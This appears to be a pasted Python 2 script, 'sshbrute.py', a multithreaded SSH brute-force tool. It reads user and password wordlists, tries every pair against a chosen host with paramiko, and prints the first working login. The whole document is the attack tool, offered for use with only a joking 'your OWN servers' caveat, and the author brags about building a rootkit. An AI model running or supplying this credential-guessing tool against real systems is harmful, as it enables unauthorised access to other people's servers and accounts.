ssher

1. #!/usr/bin/env python
2. #############################################################
3. #     _____                                          _      #
4. #    / ____|                                        | |     #
5. #   | |     ___  _ __ ___  _ __ ___   __ _ _ __   __| |___  #
6. #   | |    / _ \| |_ | _ \| |_ | _ \ / _| | |_ \ / _| / __| #
7. #   | |___| (_) | | | | | | | | | | | (_| | | | | (_| \__ \ #
8. #    \_____\___/|_| |_| |_|_| |_| |_|\__|_|_| |_|\____|___/ #
9. #                                                           #
10. #############################################################
11. # Simply execute normally as a python file. :)
12. # python sshbrute.py
13. # A command menu will be given.
14. # Please use the -v [verbose] so you will know what password/user it's bruteforcing with
15. # Have fun bbruteforcing your OWN servers :)
16. # Sincerely -Chris Poole | @codingplanets
17. #########################################
18. import sys, time
19. from threading import Thread
20.  
21. try:
22.     from paramiko import SSHClient
23.     from paramiko import AutoAddPolicy
24. except ImportError:
25.     print '''
26.    You need paramiko module.
27.    Much love from Chris! <3 ^_^    
28.    aptitude install python-paramiko
29.    apt-get install python-paramiko
30.    yum install python-paramiko\n'''
31.     sys.exit(1)
32.  
33.  
34. def license():
35.     '''Print the usage license to this software, yeah, it's the same as above'''
36.     print '''
37.    If you're here you must love my work by now! ;3
38.    I'm still on the verge of creating the rootkit I've
39.    been pushing for! ^_^ I love everyone<3 you must love
40.    me also!
41.    '''
42.  
43.  
44. class BruteForce(Thread):
45.     def __init__(self, username, password, target, port, timeout):
46.         super(BruteForce, self).__init__()
47.  
48.         self.__port   = port
49.         self.target   = target
50.         self.password = password
51.         self.user     = user
52.         self.timeout  = timeout
53.         self.status   = 'unknown'
54.  
55.  
56.     def run(self):
57.         ssh = SSHClient()
58.         ssh.set_missing_host_key_policy(AutoAddPolicy())
59.         try:
60.             ssh.connect(self.target, port = self.__port, username = self.user, password = self.password, pkey=None, timeout = self.timeout, allow_agent=False, look_for_keys=False)
61.             self.status = 'ok'
62.             ssh.close()
63.         except Exception, e:
64.             self.status = 'error'
65.             pass
66.  
67.  
68. def makelist(file):
69.     items = []
70.  
71.     try:
72.         fd = open(file, 'r')
73.     except IOError:
74.         print 'unable to read file \'%s\'' % file
75.         pass
76.  
77.     except Exception, e:
78.         print 'unknown error'
79.         pass
80.  
81.     for line in fd.readlines():
82.         item = line.replace('\n', '').replace('\r', '')
83.         items.append(item)
84.  
85.     return items
86.  
87.  
88. if __name__ == '__main__':
89.     from optparse import OptionError
90.     from optparse import OptionParser
91.    
92.    
93.     version = '''The version is...
94.    1337!!!! you should have knew that!'''
95.  
96.     usage = '%s [-H target] [-p port] [-U userslist] [-P wordlist] [-T threads] [-w timeout] [-v]' % sys.argv[0]
97.    
98.     print "Usage: %s -H 127.0.0.1 -p 22 -U user.txt -P list.txt -T 16 -w 30 -v" % sys.argv[0]
99.     print "  "
100.  
101.  
102.     parser = OptionParser(version=version, usage=usage)
103.  
104.     parser.add_option('-H', dest='target', help='hostname/ip')
105.     parser.add_option('-p', type='int', dest='port', default=22, help='port (default:%default)')
106.     parser.add_option('-U', dest='userlist', help='userlist file')
107.     parser.add_option('-P', dest='passlist', help='passwordlist file')
108.     parser.add_option('-T', type='int', dest='threads', default=16, help='number of connections in parallel (%default threads)')
109.     parser.add_option('-w', type='int', dest='timeout', default=30, help='defines the max wait time in seconds for responses (%default secs)')
110.     parser.add_option('-v', '--verbose', action='store_true', dest='verbose', help='verbose')
111.     parser.add_option('-l', '--license', action='store_true', dest='license', help='license')
112.  
113.     (options, args) = parser.parse_args()
114.  
115.     if options.license:
116.         license()
117.         sys.exit(0)
118.  
119.     if not options.target or not options.userlist or not options.passlist:
120.         parser.print_help()
121.         sys.exit(1)
122.  
123.     target = options.target
124.     port = options.port
125.     users = options.userlist
126.     passwords = options.passlist
127.     threads = options.threads
128.     timeout = options.timeout
129.    
130.     results = []
131.     tcounter = 0
132.  
133.     userlist = makelist(users)
134.     passwordlist = makelist(passwords)
135.  
136.     print "[!] SSH-Brute | Created by Chris Poole [!]"
137.     print "[*] %s user(s) loaded." % str(len(userlist))
138.     print "[*] %s password(s) loaded." % str(len(passwordlist))
139.     print "[*] Brute Force started."
140.  
141.     for user in userlist:
142.         for password in passwordlist:
143.             current = BruteForce(user, password, target, port, timeout)
144.             results.append(current)
145.             current.start()
146.             tcounter += 1
147.             if options.verbose:
148.                 print "   [+] user: %s" % user + "  password: %s\n" % password,
149.             if tcounter == threads:
150.                 for result in results:
151.                     result.join()
152.                     if result.status == 'error':
153.                         pass
154.                     else:
155.                         print "\n[*] Login successful!"
156.                         print "[*] user: %s" % result.user
157.                         print "[*] password: %s\n" % result.password
158.                         sys.exit(0)
159.                 tcounter = 0
160.    
161.    
162.     sys.exit(0)